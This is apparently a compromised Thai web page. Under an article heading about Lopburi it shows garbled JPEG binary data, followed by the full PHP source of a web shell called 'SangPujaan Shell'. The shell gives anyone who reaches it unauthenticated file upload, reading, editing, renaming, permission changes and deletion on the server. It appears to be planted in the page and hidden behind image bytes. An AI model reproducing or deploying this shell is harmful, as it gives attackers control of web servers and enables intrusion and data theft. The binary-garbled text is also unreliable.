บทความที่น่าสนใจ

One Soul One Art for Lopburi

ÿØÿà JFIF  ÿá *Exif II*  1  Google ÿÛ „                ÿÀ X X ÿÄ   ÿÄ 2  !"#12Q3ABa $%CbÿÄ  ÿÄ 0 !1AQa¡"2q‘±BÁRáð$ÿÚ  ? Ꞁh€h€h€h€h€h€h€h€h†¶7™ˆÞghù£æyÚ#ûè&w×Ümb0~K YH1^érŘ̉¬ Œdf$Hd`¢bcmYNöÞ†UWN%ŸÁ+µìžµu΍W$ã.æi4ÖbÔšI¦žSO™ Ëw±‡Vÿ ï “ŸŠ£Ê?Áø!sþV“Õícü¿—ï$Öÿ ûE[ù”sþU©/n<ûOf¢ÊTø¨ZÁ[ÃKä|‹Þes1´ÈÆ;ìB%1”§>8©c]WíÞf¹»¶vÕ§AÊ2p“‹p–bÚçÃ.«¦VÏ‹i¦ü=s× Ç!–­ya ØJC ?3&@€aæG1 1ó3¯ŠÕ£Fsä¼¢ëKÓ+êw1´¶Ã©=¢¥RËè“›I·Ñg/’L£™ß®6MkHÞ|±‚±!@€ ™@ÁYrdF&c‘@ÎѼí¬SÖ(e$›Ëð_ÛFÐ_ 5¥NUk:pP‹“N¤¤ß m¤©ÆY{l²²ðŒF?¿ê­´( ¯öÒlçqŒJ–Ö•ˆO9Ž!'ÄÉg3ñÊ8Ï”ušrŸ ‹Æû·Ñg|zdÈÖøK}FÉÜN¼{Þâ’‹yœå¨9å,æxÊRY뇕`uçyXLd¾ÊÒCbí&EibÁeÜYŒÐ,(™gã%$šêhúÔeF¤©Oꌚxiîž[Oî›Ošd ¿Ôc™Íb¼ù%b cb°‡…§5 Ú"ø‚Ï&O3™öŽ_G‰‡èžõ 7o3‡Ç ZyUãU’éöÛ2e|’lÒMµDE©j!‹aˆ›!°¦Æ€çWw™Õ™åê»"êÇWkìѪ…Wbâ»’«+ST¨³‘&Y"›0´0„¿N€ÉúoÖYdq *j¿³±v.äòjû1Ó¹WÙÁXÊ[µI-zÝYÀuªÖt§Œ~²(zE¥‡%¶wþÉv)`ÆßsÓúÆªâçäã˜xÎÅUĔˌݤ·øÕñÃo¼m}–^){Ÿ£W©N”U…8Ï’Š•WN*ù^T*<$¢”TwÏ5ƒs{gíB›Æ¦Xþ¢kƒóV¯yitD~ƒJ óÇ—â* û 9‚ r?N¥5ï8æ””wðxYû­ü#›{mÛíJ„«ixjNŒªÉÇ?\¦¢³–mClÊ ©'øú”œæ~Lh tõ²ê ÷jT ´xU+MMB?ꈊÓžŸÙöAHÄÌÆ ãJ£.)B;¾œM/n^†âѾ%j´{«k«‡ÝGgQQ§R¢]7©•o dmª)Y .Žæp驍§V²”Ÿ>{+Zâ”×ËP´Â™øå+¯Y“¼Ì—ÀÆû iœQrÙ,·àT¾†z,ûwÞ×Ñ¢œ?»uÄÙµIÚ¾§Ykk¬йŠ 2¨…q ;y#gi:•\¥¡ÄÚr‚m¦ß YË[{l·{t¿j{Kkg§S£Fê¤ï;št¥ wu#N”¡NªÚ¦â¤ÓO ÊIɹKå ·UKˆˆˆˆˆÚ"#hˆˆˆˆøµ.9¡·'—»gÞ…€h ÓÖ¾ßjgUl8¸?mQäÿ æ„„Æ~y-‚CóÊ8” Ž>îÊ•ÒùÖë“\×úòõæM{3ÚíC³Õœí%˜Kë§,ðËÏ ¦¤ºI4ú<Å´ãÝ9èõŒBÕôöø®¡­íîL,íSæG5Ê—!Ω[DP®.}V@ åOKj„;¾,¥Ë<þÛ{~ Y†¯tﻥJ¬ÞgÀß }%ÛqoùnÓkc-§—õ½xEÞ¦]Ô”ì|;Ýã\Dp0;%—ꤙöG(Èg`dΩogJݾéa>œO‰ì†±ÚKýb0WÒStÖ»¨)arRœb¥%äÛß2æòi~ ¥>™—¥“Çal3©nBÖ"ý±~=-¦s]ž<º„ÒõÐ;5¶µeDžß†— ’¤`ê7G÷àà‡è]N»@PŸ§®Re#¿$äNÚ¨Nã Æ=>A11å .¾M«2öåM*“¡LcÊúÁ Pûg™W66KŠ¢üI‘÷ùÉ ¬dâò¶h›èPh€h€h€ç/}C)êþU±vÊœ®K˜†oaìó滏ø¨`þ`C?ˆ¦å<€„  ”?֝˜Ø~W-}e[ÐêLO²bFž![Ü‚ˆLÌ1Ì&€£Å2kûø`½e²s?+-®¨%<6Š³QLå2rñ°bCÄFaúæ@ /@4@4@4SÕšDÌvMkc``2DdU˜" E%3331N…Q¦½ƒæÁtõ+ NÇfØ»˜ªQµÿ %cì¦,ÊP5NÓ÷S³´–ÓaŠŸôÆéf¨ç¾²¿¨šº‹È%~I¬)•Ì›fY¸LFÐSùŒ||h ÿ m6¼¯Sz‡O$z >ªW^ÌÉ­j»ÅJ™ñï·Nâl˜‡¬Y‰HâéGŽLÀb¬Ë²qŒ$ˆÙöN€ˆzwÇ%é­LÄäE†¼™>¦J]QÏ"(&¢ÔòþˆªL?…#Çí˜ÐPèNëcI¡]5L&’ÒA”‘œÿ 9’™™ùýô‹@4@4@sƒ¥;žËÿ ôÊÃe²¸:è+ÀXæ.˜=y*åf@é¦òYµ+ \Mq ³–—‚*ñ` H÷ƒ˜›Xוü<¢ÿ Y¯§ìc—Iqz+{¿¹k ùLJãÄ'+ø"§ùh oLw±q©ÃØ¡7îuètýµŠ•æœLØ%ÇáDùö‡m·"þñ +ޏï¯&ì–,%ˆaÙêµàŒtEÕcÎü(¬MŸÓq²ãŽÅB[~{’éÞòó µ†7dpîUΰŒâÆ’ýòªØK-òç$1!0¿$,f £<¾tP4@4@4@SÔ;>ªÀ\^'×b-®À§ñÀ².‚ß~PqûÆ€ÁâûÂ'%uÐPÜ&ÿ J쁰7[}®ƒŸ/)¦co™ÐÌwgØTØ]ÅbqámvÚì ,!¢è-÷ä'q?¼h ¥>Ùq+”c( ¢ôd’pˆæ»|âȳõò‚û¾Jc´£»fÅcíMúXÊ5ïO9÷KDyb[¿”„çy=ʇb‘"ö’‰ÍÐ Ð Ð Ð Ð Ð Ð ÿÙ$value){ $_POST[$key] = stripslashes($value); } } echo ' ink href="" rel="stylesheet" type="text/css"> itle>SangPujaan Shell tyle> body{ font-family: "Racing Sans One", cursive; background-color: black; color:white; } #content tr:hover{ background-color: red; text-shadow:0px 0px 10px #fff; } #content .first{ background-color: red; } table{ border: 1px #000000 dotted; } a{ color:white; text-decoration: none; } a:hover{ color:blue; text-shadow:0px 0px 10px #ffffff; } input,select,textarea{ border: 1px #000000 solid; -moz-border-radius: 5px; -webkit-border-radius:5px; border-radius:5px; }

SangPujaan Shell

'; if(isset($_GET['filesrc'])){ echo "
Path : '; if(isset($_GET['path'])){ $path = $_GET['path']; }else{ $path = getcwd(); } $path = str_replace('\\','/',$path); $paths = explode('/',$path); foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true; echo '/'; continue; } if($pat == '') continue; echo ''.$pat.'/'; } echo '
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo 'Upload Berhasil
'; }else{ echo 'Upload Gagal
'; } } echo '
File Upload :
Current File : "; echo $_GET['filesrc']; echo '

'; echo('
'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'
'); }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '
'.$_POST['path'].'

'; if($_POST['opt'] == 'chmod'){ if(isset($_POST['perm'])){ if(chmod($_POST['path'],$_POST['perm'])){ echo 'Change Permission Berhasil
'; }else{ echo 'Change Permission Gagal
'; } } echo '
Permission :
'; }elseif($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo 'Ganti Nama Berhasil
'; }else{ echo 'Ganti Nama Gagal
'; } $_POST['name'] = $_POST['newname']; } echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w'); if(fwrite($fp,$_POST['src'])){ echo 'Berhasil Edit File
'; }else{ echo 'Gagal Edit File
'; } fclose($fp); } echo '

'; } echo '
'; }else{ echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo 'Directory Terhapus
'; }else{ echo 'Directory Gagal Terhapus
'; } }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){ echo 'File Terhapus
'; }else{ echo 'File Gagal Dihapus
'; } } } echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue; echo ''; } echo ''; foreach($scandir as $file){ if(!is_file($path.'/'.$file)) continue; $size = filesize($path.'/'.$file)/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB'; }else{ $size = $size.' KB'; } echo ''; } echo '
Name
Size
Permission
Modify
'.$dir.'
--
'; if(is_writable($path.'/'.$dir)) echo ''; elseif(!is_readable($path.'/'.$dir)) echo ''; echo perms($path.'/'.$dir); if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo ''; echo '
'.$file.'
'.$size.'
'; if(is_writable($path.'/'.$file)) echo ''; elseif(!is_readable($path.'/'.$file)) echo ''; echo perms($path.'/'.$file); if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo ''; echo '
'; } echo '

SangPujaan - Copyright 2k17
'; function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?> แสดงผล 1078 ครั้ง